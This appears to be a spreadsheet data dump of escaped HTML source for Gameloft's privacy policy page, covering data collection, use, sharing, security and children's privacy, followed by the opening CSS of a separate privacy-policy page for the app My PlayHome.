                    &lt;a href="/ja/privacy-notice/"&gt;&lt;span class="capt"&gt;日本語&lt;/span&gt;&lt;/a&gt;_x005F_x000D_
                &lt;/li&gt;_x005F_x000D_
                            &lt;li class="" data-language="ko"&gt;_x005F_x000D_
                    &lt;a href="/ko/privacy-notice/"&gt;&lt;span class="capt"&gt;한국어&lt;/span&gt;&lt;/a&gt;_x005F_x000D_
                &lt;/li&gt;_x005F_x000D_
                            &lt;li class="" data-language="fa"&gt;_x005F_x000D_
                    &lt;a href="/fa/privacy-notice/"&gt;&lt;span class="capt"&gt;فارسی&lt;/span&gt;&lt;/a&gt;_x005F_x000D_
                &lt;/li&gt;_x005F_x000D_
                            &lt;li class="" data-language="hi"&gt;_x005F_x000D_
                    &lt;a href="/hi/privacy-notice/"&gt;&lt;span class="capt"&gt;Hindi&lt;/span&gt;&lt;/a&gt;_x005F_x000D_
                &lt;/li&gt;_x005F_x000D_
                            &lt;li class="" data-language="pl"&gt;_x005F_x000D_
                    &lt;a href="/pl/privacy-notice/"&gt;&lt;span class="capt"&gt;Polski&lt;/span&gt;&lt;/a&gt;_x005F_x000D_
                &lt;/li&gt;_x005F_x000D_
                            &lt;li class="" data-language="pt-br"&gt;_x005F_x000D_
                    &lt;a href="/pt-br/privacy-notice/"&gt;&lt;span class="capt"&gt;Português Brasileiro&lt;/span&gt;&lt;/a&gt;_x005F_x000D_
                &lt;/li&gt;_x005F_x000D_
                            &lt;li class="" data-language="pt-pt"&gt;_x005F_x000D_
                    &lt;a href="/pt-pt/privacy-notice/"&gt;&lt;span class="capt"&gt;Português Portugal&lt;/span&gt;&lt;/a&gt;_x005F_x000D_
                &lt;/li&gt;_x005F_x000D_
                            &lt;li class="" data-language="ru"&gt;_x005F_x000D_
                    &lt;a href="/ru/privacy-notice/"&gt;&lt;span class="capt"&gt;Русский&lt;/span&gt;&lt;/a&gt;_x005F_x000D_
                &lt;/li&gt;_x005F_x000D_
                            &lt;li class="" data-language="th"&gt;_x005F_x000D_
                    &lt;a href="/th/privacy-notice/"&gt;&lt;span class="capt"&gt;ไทย&lt;/span&gt;&lt;/a&gt;_x005F_x000D_
                &lt;/li&gt;_x005F_x000D_
                            &lt;li class="" data-language="vi"&gt;_x005F_x000D_
                    &lt;a href="/vi/privacy-notice/"&gt;&lt;span class="capt"&gt;Tiếng Việt&lt;/span&gt;&lt;/a&gt;_x005F_x000D_
                &lt;/li&gt;_x005F_x000D_
                            &lt;li class="" data-language="tr"&gt;_x005F_x000D_
                    &lt;a href="/tr/privacy-notice/"&gt;&lt;span class="capt"&gt;Türkçe&lt;/span&gt;&lt;/a&gt;_x005F_x000D_
                &lt;/li&gt;_x005F_x000D_
                            &lt;li class="" data-language="zh-hans"&gt;_x005F_x000D_
                    &lt;a href="/zh-hans/privacy-notice/"&gt;&lt;span class="capt"&gt;简体中文&lt;/span&gt;&lt;/a&gt;_x005F_x000D_
                &lt;/li&gt;_x005F_x000D_
                            &lt;li class="" data-language="zh-hant"&gt;_x005F_x000D_
                    &lt;a href="/zh-hant/privacy-notice/"&gt;&lt;span class="capt"&gt;繁體中文&lt;/span&gt;&lt;/a&gt;_x005F_x000D_
                &lt;/li&gt;_x005F_x000D_
                    &lt;/ul&gt;_x005F_x000D_
    &lt;/div&gt;_x005F_x000D_
&lt;/div&gt;_x005F_x000D_
                &lt;/div&gt;_x005F_x000D_
                                &lt;div class="clr"&gt;&lt;/div&gt;_x005F_x000D_
            &lt;/div&gt;_x005F_x000D_
        &lt;/div&gt;_x005F_x000D_
    &lt;/header&gt;_x005F_x000D_
_x005F_x000D_
&lt;section id="main-wrapper"&gt;_x005F_x000D_
    &lt;div class="inner-content"&gt;_x005F_x000D_
        &lt;div class="gl-legal-content pad-edge par"&gt;_x005F_x000D_
            &lt;div class="auto gl-legal-m-center"&gt;_x005F_x000D_
                &lt;h1&gt;&lt;strong&gt;GAMELOFT PRIVACY POLICY&lt;/strong&gt;&lt;/h1&gt;_x005F_x000D_
_x005F_x000D_
                &lt;script type="text/javascript"&gt;_x005F_x000D_
  originalOnload = window.onload;_x005F_x000D_
  window.onload = function () {_x005F_x000D_
    if (originalOnload) {_x005F_x000D_
      originalOnload();_x005F_x000D_
    }_x005F_x000D_
    $.urlParam = function (param) {_x005F_x000D_
      var results = new RegExp("[\? &amp;]" + param + "=([^&amp;#]*)").exec(window.location.href.toLowerCase());_x005F_x000D_
      if (results == null) {_x005F_x000D_
        return null;_x005F_x000D_
      }_x005F_x000D_
      return decodeURI(results[1]) || 0;_x005F_x000D_
    };_x005F_x000D_
    var gdprFlag = $.urlParam("gdpr")</t>
  </si>
  <si>
    <t>+ newType + "/&gt;")_x005F_x000D_
                    .addClass("gdpr-link")_x005F_x000D_
                    .append(linkElement.innerText + " (" + attrs.href + ")");_x005F_x000D_
                }_x005F_x000D_
              });_x005F_x000D_
            } else {_x005F_x000D_
              return null;_x005F_x000D_
            }_x005F_x000D_
          } else {_x005F_x000D_
            var linkElement = this[0].children[0];_x005F_x000D_
            if (linkElement &amp;&amp; linkElement.tagName === "A") {_x005F_x000D_
              $.each(linkElement.attributes, function (idx, attr) {_x005F_x000D_
                attrs[attr.nodeName] = attr.nodeValue;_x005F_x000D_
              });_x005F_x000D_
              var flag = isEqualFlag(linkElement.innerText, attrs.href);_x005F_x000D_
_x005F_x000D_
              this.replaceWith(function () {_x005F_x000D_
                if (flag) {_x005F_x000D_
                  return $("&lt;" + newType + "/&gt;").append(linkElement.innerText);_x005F_x000D_
                } else if (!flag &amp;&amp; attrs.href.includes("?lang")) {_x005F_x000D_
                  return $("&lt;" + newType + "/&gt;")_x005F_x000D_
                    .addClass("gdpr-link")_x005F_x000D_
                    .append(attrs.href);_x005F_x000D_
                } else {_x005F_x000D_
                  return $("&lt;"</t>
  </si>
  <si>
    <t>+ newType + "/&gt;")_x005F_x000D_
                    .addClass("gdpr-link")_x005F_x000D_
                    .append(linkElement.innerText + " (" + attrs.href + ")");_x005F_x000D_
                }_x005F_x000D_
              });_x005F_x000D_
            } else {_x005F_x000D_
              return null;_x005F_x000D_
            }_x005F_x000D_
          }_x005F_x000D_
        };_x005F_x000D_
_ x000D_
        function removeLink() {_x005F_x000D_
          $(".gl-legal-content u").each(function () {_x005F_x000D_
            $(this).changeElementType("span");_x005F_x000D_
          });_x005F_x000D_
          $(".gl-legal-content a").each(function () {_x005F_x000D_
            $(this).changeElementType("span");_x005F_x000D_
          });_x005F_x000D_
        }_x005F_x000D_
_x005F_x000D_
        function isEqualFlag(title, url) {_x005F_x000D_
          if (title.toLowerCase() === url.toLowerCase()) {_x005F_x000D_
            return true;_x005F_x000D_
          } else if (url.includes("https://"))</t>
  </si>
  <si>
    <t>{_x005F_x000D_
            if (url.slice(url.length - 1) == "/") {_x005F_x000D_
              reformatUrl = url.slice(0, -1).toLowerCase();_x005F_x000D_
              if (reformatUrl === title.toLowerCase()) {_x005F_x000D_
                return true;_x005F_x000D_
              }_x005F_x000D_
            } else {_x005F_x000D_
              reformatUrl = url.slice(8).toLowerCase();_x005F_x000D_
              if (reformatUrl === title) {_x005F_x000D_
                return true;_x005F_x000D_
              }_x005F_x000D_
            }_x005F_x000D_
          } else if (url.includes("mailto")) {_x005F_x000D_
            return true;_x005F_x000D_
          } else {_x005F_x000D_
            return false;_x005F_x000D_
          }_x005F_x000D_
        }_x005F_x000D_
_x005F_x000D_
        removeLink();_x005F_x000D_
      })(jQuery);_x005F_x000D_
    }_x005F_x000D_
  };_x005F_x000D_
&lt;/script&gt;_x005F_x000D_
&lt;style type="text/css"&gt;.gdpr-link {_x005F_x000D_
    word-break: break-all;_x005F_x000D_
  }_x005F_x000D_
&lt;/style&gt;_x005F_x000D_
&lt;style type="text/css"&gt;a {_x005F_x000D_
    text-decoration: underline;_x005F_x000D_
    color: #00bff9;_x005F_x000D_
    word-break: unset ! important;_x005F_x000D_
  }_x005F_x000D_
  table td,_x005F_x000D_
  table th {_x005F_x000D_
    border: 1px solid #bababa;_x005F_x000D_
    padding: 10px;_x005F_x000D_
  }_x005F_x000D_
  .text-justify {_x005F_x000D_
    text-align: justify;_x005F_x000D_
  }_x005F_x000D_
&lt;/style&gt;_x005F_x000D_
&lt;p&gt;</t>
  </si>
  <si>
    <t>Your privacy is important to us, and we take our responsibility of caring for it seriously. We respect your privacy rights and are committed to protecting the personal information that is collected about you. This Privacy Policy describes what information Gameloft collects and how we use, disclose, transfer, and store it.</t>
  </si>
  <si>
    <t>If you do not want Gameloft to collect, store, use or share your information in the ways described in this Privacy Policy, you may not be able to play our games or use our services.&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;Gameloft SE, including its subsidiary companies (&amp;ldquo;Gameloft&amp;rdquo;), collects, stores, and uses your information as a data controller in connection with, and in order to provide and develop, Gameloft&amp;rsquo;s games, mobile applications, services and websites (together referred to as the &amp;ldquo;Services&amp;rdquo;) in accordance with this privacy policy (&amp;ldquo;Privacy Policy&amp;rdquo;).&lt;/p&gt;_x005F_x000D_
_ x000D_
&lt;p&gt;All of our Services, whether used on mobile devices, PCs or other platforms, are governed by this Privacy Policy.&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
 &lt;p&gt;By using the Services, you hereby consent to this Privacy Policy.&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">This Privacy Policy is effective as of May 10, 2020 and was last modified on May 4, 2020.&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;If you have any questions, comments or concerns regarding our Privacy Policy and/or practices, please see the&amp;nbsp;&amp;ldquo;&lt;u&gt;How to contact us&lt;/u&gt;&amp;rdquo;&amp;nbsp;section below.&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;&amp;nbsp;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;h2&gt;1 &amp;ndash; How we collect your information&lt;/h2&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;Gameloft collects some information from you when you: (a) create an account; (b) get a subscription to play our games; (c) play our games or use game-related services; (d) make a purchase within our Services; (e) create user-generated content; (f) watch advertisements within our Services; (g) sign up for a newsletter; (h) contact Gameloft customer service and take part in technical-support sessions; (i) enter a contest, event or sweepstakes, or participate in a challenge held by Gameloft; (j) chat with other users of the Services; (k) signal interest in participating in a playtest; (l) share or contribute to our social media channels and other community websites, including forums; or (m) apply for a job.&lt;/p&gt;_x005F_x000D_
_ x000D_
&lt;p&gt;&amp;nbsp;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;h2&gt;2 &amp;ndash; Information we collect&lt;/h2&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;Gameloft collects only adequate and relevant information limited to the purposes defined hereunder.&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;&lt;strong&gt;a &amp;ndash; Information you provide us&lt;/strong&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;ul&gt;_x005F_x000D_
	&lt;li&gt;Contact information (such as your name and email address)&lt;/li&gt;_x005F_x000D_
	&lt;li&gt;Your age&lt;/li&gt;_x005F_x000D_
	&lt;li&gt;Your gender&lt;/li&gt;_x005F_x000D_
	&lt;li&gt;Your birthdate&lt;/li&gt;_x005F_x000D_
	&lt;li&gt;Your username and password&lt;/li&gt;_x005F_x000D_
	&lt;li&gt;Profile information (such as a profile picture)&lt;/li&gt;_x005F_x000D_
	&lt;li&gt;Information that you provide when seeking help from our customer service (such as chat logs, contact details such as your phone number and email address if necessary to resolve your request, and customer support tickets)&lt;/li&gt;_x005F_x000D_
	&lt;li&gt;Other information you provide us (such as information used to identify a lost account)&lt;/li&gt;_x005F_x000D_
&lt;/ul&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;&lt;strong&gt;b &amp;ndash; Information we automatically collect directly from you when you use our Services&lt;/strong&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;ul&gt;_x005F_x000D_
	&lt;li&gt;Information about your game progress and activity&lt;/li&gt;_x005F_x000D_
	&lt;li&gt;Information about your interactions with other players&lt;/li&gt;_x005F_x000D_
	&lt;li&gt;IP address and device identifiers (such as your device ID, advertising ID, MAC address, IMEI)&lt;/li&gt;_x005F_x000D_
	&lt;li&gt;Information about your device (such as device name and operating system, browser information, including browser type and the language you prefer)&lt;/li&gt;_x005F_x000D_
	&lt;li&gt;Information we collect using cookies and similar technologies (Note: You can refer to our Cookies Policy to learn more about opting out of such technologies)&lt;/li&gt;_x005F_x000D_
	&lt;li&gt;General geolocation information&lt;/li&gt;_x005F_x000D_
	&lt;li&gt;Precise geolocation information (GPS), if you configure your device location settings&lt;/li&gt;_x005F_x000D_
	&lt;li&gt;Gameloft player ID&lt;/li&gt;_x005F_x000D_
&lt;/ul&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;&lt;strong&gt;c &amp;ndash; Information we obtain from our partners (advertisers, others publishers, distributors, billing partners, ad network providers)&lt;/strong&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;ul&gt;_x005F_x000D_
	&lt;li&gt;Information that we receive if you decide to connect to a third-party social network (such as Facebook or Game Center)&lt;/li&gt;_x005F_x000D_
	&lt;li&gt;Information from billing and distribution partners (if you subscribe to certain games or make in-game purchases)&lt;/li&gt;_x005F_x000D_
	&lt;li&gt;Information for advertising and analytics purposes, so we can provide you with better Services&lt;/li&gt;_x005F_x000D_
	&lt;li&gt;Information (such as IPs, Device IDs) we may receive from other partners, which we use to place / send you advertising&lt;/li&gt;_x005F_x000D_
&lt;/ul&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;&amp;nbsp;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;h2&gt;3 &amp;ndash; How we use your information&lt;/h2&gt;_x005F_x000D_
_x005F_x000D_
</t>
  </si>
  <si>
    <t>&lt;p&gt;Under normal circumstances, we only collect personal information from you when:&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;ul&gt;_x005F_x000D_
	&lt;li&gt;we have a legal obligation to collect and process personal information from you&lt;/li&gt;_x005F_x000D_
	&lt;li&gt;we have your consent to do so&lt;/li&gt;_x005F_x000D_
	&lt;li&gt;we need the personal information to fulfill a contract with you and provide you with the Services, such as customer support services, bug and service-error detection, and fraud prevention&lt;/li&gt;_x005F_x000D_
	&lt;li&gt;the processing is in our legitimate interests (when we serve and measure the effectiveness of advertising or marketing campaigns, analyze your gaming activities, protect and improve our products and services) and not overridden by your rights, or when we have a legal obligation to collect personal information from you&lt;/li&gt;_x005F_x000D_
&lt;/ul&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;&amp;nbsp;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt; We primarily use the information to provide you with a better gaming experience, but we also use your information, both individually and combined, as follows:&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;&lt;strong&gt;To operate our business and to enhance your gaming experience, including to:&lt;/strong&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;ul&gt;_x005F_x000D_
	&lt;li&gt;provide you with the Services that are suitable for your age and compliant with the applicable laws of your country of residence&lt;/li&gt;_x005F_x000D_
	&lt;li&gt;provide gaming experiences that you may like and functionalities you have subscribed to&lt;/li&gt;_x005F_x000D_
	&lt;li&gt;track your use of the Services to help us learn more about your gaming activities and understand your preferences and tendencies, so that we can personalize your experience, provide you with in-game offers and notifications that are tailored to you, and otherwise enhance your gaming experience&lt;/li&gt;_x005F_x000D_
	&lt;li&gt;facilitate sharing on social networks&lt;/li&gt;_x005F_x000D_
	&lt;li&gt;register your participation in a contest and contact you in the event of a prize&lt;/li&gt;_x005F_x000D_
	&lt;li&gt;organize and ensure the proper management of events (e.g. registering your participation in an event, granting access to an event, prize delivery)&lt;/li&gt;_x005F_x000D_
	&lt;li&gt;offer you the opportunity to take part in playtesting (game tests)&lt;/li&gt;_x005F_x000D_
	&lt;li&gt;protect against cheating, crime or fraud, or for other security reasons&lt;/li&gt;_x005F_x000D_
	&lt;li&gt;identify and fix bugs and service errors&lt;/li&gt;_x005F_x000D_
	&lt;li&gt;use it for administration, analytics, research, and optimization&lt;/li&gt;_x005F_x000D_
	&lt;li&gt;compile statistics&lt;/li&gt;_x005F_x000D_
	&lt;li&gt;comply with all regulatory and legal requirements, and answer any requests from Data Protection Authorities or any law enforcement agency&lt;/li&gt;_x005F_x000D_
	&lt;li&gt;respect security requirements (e.g. performing audits)&lt;/li&gt;_x005F_x000D_
&lt;/ul&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;&lt;strong&gt;To provide you with support, communicate with you and respond to any requests or questions you have submitted through our customer support.&lt;/strong&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;&lt;strong&gt;To personalize our communication with you, including to:&lt;/strong&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;ul&gt;_x005F_x000D_
	&lt;li&gt;handle your subscription to, and opting-out of, our newsletters&lt;/li&gt;_x005F_x000D_
	&lt;li&gt;contact you to promote our Services and contests we may offer&lt;/li&gt;_x005F_x000D_
	&lt;li&gt;send you, with your prior consent, promotions or marketing materials (we will provide you with the opportunity to opt out of receiving such materials in the future)&lt;/li&gt;_x005F_x000D_
	&lt;li&gt;offer in-game surveys&lt;/li&gt;_x005F_x000D_
	&lt;li&gt;provide you with advertising that better suits your interests and profile and is age-/gender-appropriate and targeted to your general location&lt;/li&gt;_x005F_x000D_
	&lt;li&gt;serve and measure the effectiveness of advertising&lt;/li&gt;_x005F_x000D_
	&lt;li&gt;collect any personal information you may disclose through messages you choose to send to another user or defined group of users through our message, chat, post or other in-game functions, as well as to collect necessary personal information belonging to the user(s) you are contacting, in order to facilitate communication (Note: We will never collect any information sent outside of the functionality of our Services, including through emails or text messages)&lt;/li&gt;_x005F_x000D_
	&lt;li&gt;personalize your content and offers&lt;/li&gt;_x005F_x000D_
	&lt;li&gt;send you push notifications (should you choose to allow that function)&amp;mdash;only for users 13 years of age or older in the United States&lt;/li&gt;_x005F_x000D_
&lt;/ul&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;For some of the purposes described above, Gameloft may use and perform analytics. Analytics information supports business analysis and operations, allows product development, improves products and Services, personalizes content, provides advertising, and makes recommendations.&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;&amp;nbsp;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;h2&gt;4 &amp;ndash; How we retain your information&lt;/h2&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;Gameloft retains, uses and stores your information as long as you are playing our games or using our Services, and also for the period necessary to fulfill all the purposes described in this Privacy Policy, in compliance with the applicable laws of your country of residence.</t>
  </si>
  <si>
    <t>We want to inform you that a longer retention period could be required to resolve disputes, or answer regulatory or police requests. In such cases, the collected information will be used and stored until the request is closed.&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;&amp;nbsp;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;h2&gt;5 &amp;ndash; How we share your information&lt;/h2&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;&lt;u&gt;With Gameloft entities&lt;/u&gt;&lt;/p&gt;_x005F_x000D_
_ x000D_
&lt;p</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;In order to operate the Services, your personal information may be transferred to other Gameloft studios or entities, subsidiaries, processors or third parties located worldwide as described below (please refer to &amp;quot;International operations and transfers of your information&amp;quot;).&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;&lt;u&gt;With third parties&lt;/u&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt; We use third-party services that have limited access to your information for specific purposes, such as administration, analytics, optimization, advertising, prize delivery, marketing assistance, customer service, and data analysis. They assist us with our operations.&amp;nbsp;&lt;br /&gt;_x005F_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Such third parties are authorized to use your information for these purposes only.&lt;/p&gt;_x005F_x000D_
_ x000D_
&lt;p&gt;If you decide, while using our Services, to use social sharing features such as &amp;ldquo;Share&amp;rdquo; or &amp;ldquo;Like&amp;rdquo; on Facebook or other third-party social network sites, this may allow the sharing and collection of personal and non-personal information both to and from such third-party social networks.&lt;br /&gt;_x005F_x000D_
</t>
  </si>
  <si>
    <t>You should visit the policies of such third parties for more information about their information collection practices.&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;Since Gameloft is part of the Vivendi Group, your information may be transferred to Vivendi entities for global projects. In that case, you will be informed of the nature of the relevant projects and the entities involved, and you will be asked for your prior consent before any transfer of your information takes place.&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;&lt;u&gt;With authorities&lt;/u&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt; We reserve the right to report to law enforcement agency activities that we, in good faith, believe to be illegal.</t>
  </si>
  <si>
    <t>We will investigate or take action to counter illegal activity, suspected abuse or unauthorized use of the Services, or to protect the property or safety of others. We may also disclose your information if required by any law or court order worldwide, if the information relates to actual or threatened harmful conduct.&lt;br /&gt;_x005F_x000D_
 In that case, we will consider applicable local laws, the nature of the order, as well as the legitimacy and proportionality of your information.&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;&lt;u&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">In case of sale of our company&lt;/u&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt; In connection with any sale of our company or any line of business (including the assets relating thereto), customer information generally is one of the transferred business assets. In the event of any such sale or disposition of any or all of our business, your information may be transferred to the acquirer.&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;&amp;nbsp;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;h2&gt;6 &amp;ndash; International operations and transfers of your information&lt;/h2&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;As part of our international operations, we may transfer personal information to our affiliates (which means subsidiaries, parent companies, joint ventures, and other corporate entities under common ownership of Gameloft S.E) from time to time for our legitimate business purposes.&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
</t>
  </si>
  <si>
    <t>&lt;p&gt; Gameloft is headquartered in France, and we have operations, entities and Services provided in Canada, the United States and throughout the world. We have taken measures to ensure that your personal information is treated securely and lawfully, and that it will receive an adequate level of protection in the jurisdictions in which we process it.&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;&amp;nbsp;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;h2&gt;7 &amp;ndash; Security and confidentiality of your personal information&lt;/h2&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;</t>
  </si>
  <si>
    <t>We have implemented security measures to safeguard and help prevent unauthorized access, maintain data security, and correctly use the personal information collected through the Services.&amp;nbsp;&lt;br /&gt;_x005F_x000D_
 We take, and force applicable third parties to take, reasonable precautions to protect your personal information against loss, misuse, unauthorized disclosure, alteration, and destruction. However, please remember that no transmission of data over the Internet or any wireless network can be guaranteed to be 100% secure.</t>
  </si>
  <si>
    <t>As a result, while we strive to protect your information, we cannot guarantee the security of your information and do not assume any responsibility for the unauthorized use of, or access to, your information that is under our control.&amp;nbsp;&lt;br /&gt;_x005F_x000D_
When we use third parties to assist us in processing your personal information or credit card information, we take reasonable steps to ensure that they comply with this Privacy Policy and otherwise protect your personal information (including any credit card information).&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;If there is a breach of security involving your personal information, including credit card information, from our Services, we will inform you immediately according to your local regulations relating to the notification of information Breaches, and take commercially reasonable steps to rectify such breach.&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;If you believe your personal information is being improperly used by us or any third party, please immediately notify us via email at&amp;nbsp;&lt;a href="mailto:DataProtectionSupport@gameloft.com"&gt;DataProtectionSupport@gameloft.com&lt;/a&gt;.&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;&amp;nbsp;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;h2&gt;8 &amp;ndash; Children&lt;/h2&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt; We encourage parents and guardians to teach their children about privacy and how their information may be used on the Internet. Children should never disclose their name, address or phone number, or any personal information, without their parents&amp;rsquo; or guardian&amp;#39;s prior permission.&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;</t>
  </si>
  <si>
    <t>We consider a user to be a child if they are under the age of 13, unless more stringent regulation applies in their state of residence.&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;If we consider that any of our Services are directed at users under the minimum legal age required in their country of residence, we can block such users from using the Services or from providing information and/or limit the collection of information from such users as described below in more detail.&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt; No personal information should be submitted to Gameloft by users under the minimum legal age required in their state of residence. We apply the following limitations to personal information collection for a user that is not of the minimum legal age required in their state of residence.&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;Such a user cannot:&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;ul&gt;_x005F_x000D_
	&lt;li&gt;display their real name or any information in the games&lt;/li&gt;_x005F_x000D_
	&lt;li&gt;access the chat, leaderboard, forums, SNS (Facebook, Game Center, etc.)&lt;/li&gt;_x005F_x000D_
	&lt;li&gt;subscribe to newsletters&lt;/li&gt;_x005F_x000D_
	&lt;li&gt;use any other feature where users could appear under their real names&lt;/li&gt;_x005F_x000D_
&lt;/ul&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;With respect to such a user, we will prevent the collection and use of their precise geolocation data and display to them contextual advertising only (excluding any behavioral advertising).&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;Children can be invited to take part in testing our games (playtests) with their parents&amp;#39; or guardians&amp;rsquo; authorization and/or their parents&amp;#39; or guardians&amp;rsquo; physical presence being required depending on the state where the playtest is conducted.&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;Parents must exercise their privacy rights for their children.</t>
  </si>
  <si>
    <t>Please refer to the &amp;quot;Your rights&amp;quot; section of this Privacy Policy.&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;&amp;nbsp;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;h2&gt;9 &amp;ndash; Job applicants&lt;/h2&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;If you apply for a job, you may be directed to the SmartRecruiters website. If you decide to submit your application, you will also have to submit some information to SmartRecruiters, including your name, telephone number, email address and education history. The collection of this information will be governed by the SmartRecruiters Privacy Policy, which you can view here:&amp;nbsp;&lt;a href="https://www.smartrecruiters.com/privacy-policy/" target="_blank"&gt;https://www.smartrecruiters.com/privacy-policy/&lt;/a&gt;.&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;</t>
  </si>
  <si>
    <t>The Gameloft Privacy Policy for applicants can also be viewed by accessing this &lt;a href="https://www.gameloft.com/en/jobs-faq/personal-data/" target="_blank"&gt;link&lt;/a&gt;.&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;&amp;nbsp;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;h2&gt;10 &amp;ndash; Your rights&lt;/h2&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;We ask that you keep the information that you provide to us updated. You can correct any information you have provided by contacting us through&amp;nbsp;this &lt;a href="https://www.gameloft.com/zz/privacy-notice/contact-form" target="_blank"&gt;form&lt;/a&gt;.&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;You represent and warrant that all information you provide us is true and correct, and relates to you and not to any other person.&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;You can exercise your rights at any time and ask Gameloft for access to, or rectification or erasure of, your information.&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;Please note that other third parties (our data partners) may be controllers of your information. You can obtain more details and opt out of the sharing of your personal information to third parties for any purpose by contacting us through&amp;nbsp;&lt;a href="https://www.gameloft.com/zz/privacy-notice/contact-form" target="_blank"&gt;this form&lt;/a&gt;.&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;If you have previously consented to any direct marketing communication from us or subscribed to our newsletters, you can unsubscribe by clicking on a link available in each communication and newsletter we send you.&lt;/p&gt;_x005F_x000D_
_</t>
  </si>
  <si>
    <t>x000D_
&lt;p&gt;If you want to decline to allow cookies or other tracking technologies, please read our Cookies Policy on our websites.&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;Please note that game functionality, Services and features can be affected by your actions. Some of your information and its processing is mandatory</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"&gt;
&lt;html xmlns="http://www.w3.org/1999/xhtml"&gt;
&lt;head&gt;
&lt;meta http-equiv="Content-Type" content="text/html; charset=utf-8" /&gt;
&lt;title&gt;My PlayHome Privacy Policy&lt;/title&gt;
&lt;style&gt;
	body
	{
		background-color: #eee;
	}
	.text
	{
		background-color: #fff;
		margin:80px auto;
		border: dashed 1px #ccc;
		padding:30px 60px;
		max-width: 500px;
	}
	H1 {
    font-family: Georgia, serif;
    font-size: 28px;
    font-weight: bold;
    color: #006600;
    letter-spacing: 1.4px;
    border-bottom: solid 1px #006600;
    text-transform: uppercase;
}
H2 {
    font-family: Georgia, serif;
    font-size: 24px;
    font-weight: normal;
    letter-spacing: 1.2px;
    color: #009900;
}
